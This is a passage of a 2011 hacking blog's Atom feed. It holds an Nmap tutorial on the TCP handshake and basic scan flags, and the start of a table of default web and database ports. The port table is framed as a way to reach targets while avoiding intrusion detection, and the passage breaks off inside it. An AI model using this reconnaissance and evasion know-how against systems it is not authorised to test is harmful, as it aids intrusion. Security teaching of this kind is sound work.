&lt;span style="font-size: small;"&gt;&lt;span style="color: black;"&gt;&amp;nbsp;[ And this program is not coded by me, as my programming is a Null vector. :D ] &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-5382877040847161641?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/5382877040847161641/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/how-to-crack-sql-servers-password.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/5382877040847161641?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/5382877040847161641?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/how-to-crack-sql-servers-password.html' title='How to crack SQL Server&apos;s password Hashes'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CkEBQn4-fip7ImA9WhRQEUo.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-5210008845226815181</id><published>2011-11-29T08:00:00.001-08:00</published><updated>2011-12-06T03:24:13.056-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-06T03:24:13.056-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackingZone'/><category scheme='http://www.blogger.com/atom/ns#' term='KungFus'/><title>Nmap Kungfu Part 1 - Basic Scanning</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-F4K1Rae1BHw/TtUVjvJNqEI/AAAAAAAAA64/5xTgbpjzAd0/s1600/12.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-ry-gQOCt80g/TtUVtsu-nAI/AAAAAAAAA7I/jrYNggqBIyk/s1600/14.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-ry-gQOCt80g/TtUVtsu-nAI/AAAAAAAAA7I/jrYNggqBIyk/s1600/14.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="first-para" style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&amp;nbsp;Nmap is by far the most popular port scanner available. You 
can download it from &lt;i class="emphasis"&gt;&lt;a class="url" href="http://www.insecure.org/" target="_top"&gt;http://www.insecure.org/&lt;/a&gt;&lt;/i&gt;, 
and it compiles and installs in a breeze on most Windows and Unix operating 
systems including Mac OS X (&lt;span class="fixed"&gt;via configure, make, make 
install&lt;/span&gt;). You can download Windows binaries (along with the required 
Winpcap) from &lt;i class="emphasis"&gt;&lt;a class="url" href="http://www.insecure.org/" target="_top"&gt;http://www.insecure.org/&lt;/a&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;div class="section"&gt;
&lt;h3 class="sect3-title"&gt;





&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="119"&gt;&lt;/a&gt;&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="wbp08Chapter4P11"&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
One reason why nmap is so useful is that it offers many 
different scanning techniques from which you can choose. You can scan for hosts 
that are up, TCP ports, UDP ports, and even other IP protocols. &lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="120"&gt;&lt;/a&gt; &lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
Before we get deep into this Nmap, lets take a look on the basics of Scanning [How scanning is actually done].&lt;/div&gt;
&lt;div class="para"&gt;
&lt;/div&gt;
&lt;div class="para"&gt;
When a TCP connection is made to a port, the client sends a TCP 
packet with the SYN flag set to initiate the connection. If a server is 
listening on that port, it sends a packet with both the SYN and ACK flags set, 
acknowledging the client’s request to connect while asking to make a return 
connection. The client will then send a packet with the ACK flag set to 
acknowledge the server’s SYN. This is referred to as the &lt;i class="emphasis"&gt;TCP 
three-way handshake.&lt;/i&gt; When one side is done talking to the other, it will 
send a FIN packet. The other side will acknowledge that FIN and send a FIN of 
its own, waiting for the other side to acknowledge before the connection is 
truly closed. A RST packet can be sent by either side at any time to abort the 
connection. A sample TCP conversation between a client and server is shown 
here:&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;&amp;nbsp; Three way handshake process&lt;/b&gt;&lt;/div&gt;
&lt;ol class="orderedlist"&gt;
&lt;li class="first-listitem"&gt;
&lt;div class="first-para"&gt;
Client sends SYN to Server: “I want to connect.”&lt;/div&gt;
&lt;/li&gt;
&lt;li class="listitem"&gt;
&lt;div class="first-para"&gt;
Server sends SYN/ACK to Client: “Okay; I need to connect to 
you.”&lt;/div&gt;
&lt;/li&gt;
&lt;li class="listitem"&gt;
&lt;div class="first-para"&gt;
Client sends ACK to Server: “Okay.”&lt;/div&gt;
&lt;/li&gt;
&lt;li class="listitem"&gt;
&lt;div class="first-para"&gt;
Client and Server send information back and forth, 
acknowledging each other’s transmissions with ACKs. If either side sends a RST, 
the connection aborts immediately.&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;b&gt;Formal Shutdown Process &lt;/b&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;/div&gt;
&lt;/li&gt;
&lt;li class="listitem"&gt;
&lt;div class="first-para"&gt;
Client has finished the conversation; Client sends FIN to 
Server: “Goodbye.”&lt;/div&gt;
&lt;/li&gt;
&lt;li class="listitem"&gt;
&lt;div class="first-para"&gt;
Server sends ACK to Client (acknowledging Client’s FIN). 
Server then sends a separate FIN to Client: “Okay. Goodbye.”&lt;/div&gt;
&lt;/li&gt;
&lt;li class="listitem"&gt;
&lt;div class="first-para"&gt;
Client sends ACK to Server (acknowledging Server’s FIN): 
“Okay.”&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="para"&gt;
Keep this information in mind while reading through the next few 
sections. It will help you to get a better grasp on how nmap and other port 
scanners get their information.&lt;/div&gt;
&lt;div class="section"&gt;
&lt;h4 class="sect4-title"&gt;





Scanning for Hosts&lt;/h4&gt;
&lt;div class="first-para"&gt;
If you care only about determining which hosts on a network 
are up, you can use the Ping scanning method (&lt;span class="fixed"&gt;-sP&lt;/span&gt;). It 
works similarly to fping in that it sends Internet Control Message 
Protocol (ICMP) echo requests to the specified range of IP addresses and awaits 
a response. However, many hosts these days block ICMP requests. In this case, 
nmap will attempt to make a TCP connection to port 80 (by default) on the host. 
If it receives anything (either a SYN/ACK or a RST), the host is up. If it 
receives nothing at all, the host is assumed to be down or not currently on the 
network. If you want only a list of hostnames for the IP range you’ve specified, 
try a list scan (&lt;span class="fixed"&gt;-sL&lt;/span&gt;).&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border="1" class="table"&gt;&lt;thead&gt;
&lt;tr valign="top"&gt;
&lt;th align="left" class="th" scope="col" width="13%"&gt;&lt;div class="table-para"&gt;
Flag&lt;/div&gt;
&lt;/th&gt;
&lt;th align="left" class="th" scope="col" width="87%"&gt;&lt;div class="table-para"&gt;
Description&lt;/div&gt;
&lt;/th&gt;&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="13%"&gt;&lt;div class="table-para"&gt;
SYN&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="87%"&gt;&lt;div class="table-para"&gt;
Used to indicate the beginning of a TCP 
connection&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="13%"&gt;&lt;div class="table-para"&gt;
ACK &lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="87%"&gt;&lt;div class="table-para"&gt;
Used to acknowledge receipt of a previous packet or 
transmission&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="13%"&gt;&lt;div class="table-para"&gt;
FIN &lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="87%"&gt;&lt;div class="table-para"&gt;
Used to close a TCP connection&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="13%"&gt;&lt;div class="table-para"&gt;
RST&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="87%"&gt;&lt;div class="table-para"&gt;
Used to abort a TCP connection abruptly&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
The basic method of TCP port scanning is to do a TCP &lt;span class="fixed"&gt;connect() 
(-sT)&lt;/span&gt; to a port to see whether anything responds. This is the same thing 
any TCP client would do to make a connection (complete the three-way handshake), 
except nmap will disconnect by sending a RST packet as soon as the handshake is 
complete. If you want to, you can use an version scan (&lt;span class="fixed"&gt;-sV&lt;/span&gt;) 
to scan every open port for banner grabbing. Moreover you can use (-O) for detection of Operating system. Following are 
some examples of these types of scans:&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;b&gt;&amp;nbsp;Default Scan [ -sT]&lt;/b&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;a href="http://4.bp.blogspot.com/-W8yu5s6V5rM/TtUVbtHwg-I/AAAAAAAAA6w/W-ICG3hIPRc/s1600/11.png"&gt;&lt;img border="0" height="428" src="http://4.bp.blogspot.com/-W8yu5s6V5rM/TtUVbtHwg-I/AAAAAAAAA6w/W-ICG3hIPRc/s640/11.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;b&gt;Version Detection [banner grabbing] using -sV&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;a href="http://4.bp.blogspot.com/-F4K1Rae1BHw/TtUVjvJNqEI/AAAAAAAAA64/5xTgbpjzAd0/s1600/12.PNG"&gt;&lt;img border="0" height="428" src="http://4.bp.blogspot.com/-F4K1Rae1BHw/TtUVjvJNqEI/AAAAAAAAA64/5xTgbpjzAd0/s640/12.PNG" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;b&gt;Operating system Detection [using -O]&lt;/b&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&amp;nbsp;&lt;a href="http://1.bp.blogspot.com/-yZDFzz05YN8/TtUVpyEa7dI/AAAAAAAAA7A/P7PYp_-e6tI/s1600/13.PNG"&gt;&lt;img border="0" height="444" src="http://1.bp.blogspot.com/-yZDFzz05YN8/TtUVpyEa7dI/AAAAAAAAA7A/P7PYp_-e6tI/s640/13.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
In
 case you forgets all these switches, don't panic. Just hitting "nmap" 
without any switch will pop your screen with complete list of these 
switches.&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;/div&gt;
&lt;div class="para"&gt;
The following table indicates how the &lt;span class="fixed"&gt;–sT, -sV,&lt;/span&gt; and 
&lt;span class="fixed"&gt;–O&lt;/span&gt; scans operate:&lt;/div&gt;
&lt;div class="informaltable"&gt;
&lt;table border="1"&gt;
&lt;thead&gt;
&lt;tr valign="top"&gt;
&lt;th align="left" class="th" scope="col" width="26%"&gt;&lt;div class="table-para"&gt;
Nmap Sends to Host Port&lt;/div&gt;
&lt;/th&gt;
&lt;th align="left" class="th" scope="col" width="26%"&gt;&lt;div class="table-para"&gt;
Nmap Receives from Host Port&lt;/div&gt;
&lt;/th&gt;
&lt;th align="left" class="th" scope="col" width="23%"&gt;&lt;div class="table-para"&gt;
Nmap Responds&lt;/div&gt;
&lt;/th&gt;
&lt;th align="left" class="th" scope="col" width="26%"&gt;&lt;div class="table-para"&gt;
Nmap Assumes&lt;/div&gt;
&lt;/th&gt;&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
SYN&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
SYN/ACK&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="23%"&gt;&lt;div class="table-para"&gt;
ACK followed by RST&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
Port is open; host is up.&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
SYN&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
RST&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="23%"&gt;&lt;div class="table-para"&gt;
–&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
Port is closed; host is up.&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr valign="top"&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
SYN&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
–&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="23%"&gt;&lt;div class="table-para"&gt;
–&lt;/div&gt;
&lt;/td&gt;
&lt;td align="left" class="td" width="26%"&gt;&lt;div class="table-para"&gt;
Port is blocked by firewall or host is 
down.&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
This is great, but since you’re just making basic TCP connections, 
your connection most likely gets logged by the service that answers. Sometimes 
you want to be a bit quieter.&lt;/div&gt;
&lt;div class="para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="para"&gt;
For getting more deeper with silent scans, wait for Nmap Kung Fu - Part 2.&lt;/div&gt;
&lt;div class="para"&gt;
&lt;/div&gt;
&lt;div class="para"&gt;
Enjoy Hacking, Enjoy Hackplanet.&lt;/div&gt;
&lt;div class="first-para"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="first-para"&gt;
Video for this part is available at : &lt;a href="http://videos.hackplanet.in/2011/11/nmap-kungfu-part-1-basic-scanning.html" target="blank"&gt;http://videos.hackplanet.in/2011/11/nmap-kungfu-part-1-basic-scanning.html&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-5210008845226815181?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/5210008845226815181/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/nmap-kungfu-part-1-basic-scanning_29.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/5210008845226815181?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/5210008845226815181?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/nmap-kungfu-part-1-basic-scanning_29.html' title='Nmap Kungfu Part 1 - Basic Scanning'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-ry-gQOCt80g/TtUVtsu-nAI/AAAAAAAAA7I/jrYNggqBIyk/s72-c/14.PNG' height='72' width='72'/><thr:total>1</thr:total></entry><entry gd:etag='W/&quot;C0cFSHo9eip7ImA9WhRREUw.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-3014433263665545741</id><published>2011-11-23T20:53:00.001-08:00</published><updated>2011-11-23T21:03:39.462-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-23T21:03:39.462-08:00</app:edited><title>Complete list of Web and Database Ports</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://deblugando.files.wordpress.com/2010/06/2z4z1a8.jpg?w=300&amp;amp;h=220" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="292" src="http://deblugando.files.wordpress.com/2010/06/2z4z1a8.jpg?w=300&amp;amp;h=220" width="400" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;Most
 of the time, while working with hacks on web application bind up with 
some databases, a open port is a stucking point and forces us to carry 
out a port scan.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;However
 port scan is undoubtedly best option, but what if some IDS has been 
implemented on the remote system? We are gonna put ourselves into 
monitoring even before starting the attack. So why do this shit?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;Why
 not check the port numbers along with their server type and better give
 it a try on the basis of default ports as most of the Administrators 
uses the default ports only.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;Here
 i am listing the ports used on all the popular Web and Database servers
 which you might need to refer while doing some audit.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;&amp;nbsp;&lt;/span&gt;
&lt;br /&gt;
&lt;table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="width: 100%;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span class="docemphasis1"&gt;&lt;b&gt;&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Port&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt; 
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span class="docemphasis1"&gt;&lt;b&gt;&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Server&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt; 
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;66 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Oracle SQL*Net 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;80 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Hyper Text Transfer 
Protocol (HTTP) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;81 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;HTTP Proxy, 
Alternative HTTP Port, Cobalt Server Administration Port &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;443 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Secure Socket Layer 
(SSL) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;445 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Microsoft SQL Server 
over NetBIOS &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;457 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;UnixWare/Netscape 
FastTrack Server &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1080 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;SOCKS Proxy 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1100 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Oracle WebCache 
Listener &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1241 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;KaZaA 
File Sharing Server (HTTP-like protocol) &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1352 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Lotus Domino (Notes) 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1433 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Microsoft SQL Server 
2000 &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;1434 
&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
&lt;span lang="EN-GB" style="color: black; font-family: Arial; font-size: 10.5pt;"&gt;Microsoft 
SQL Server over TCP/IP Redirector &lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding-bottom: 0.75pt; padding-left: 0.75pt; padding-right: 0.75pt; padding-top: 0.75pt;" valign="top"&gt;
&lt;div class="MsoNormal"&gt;
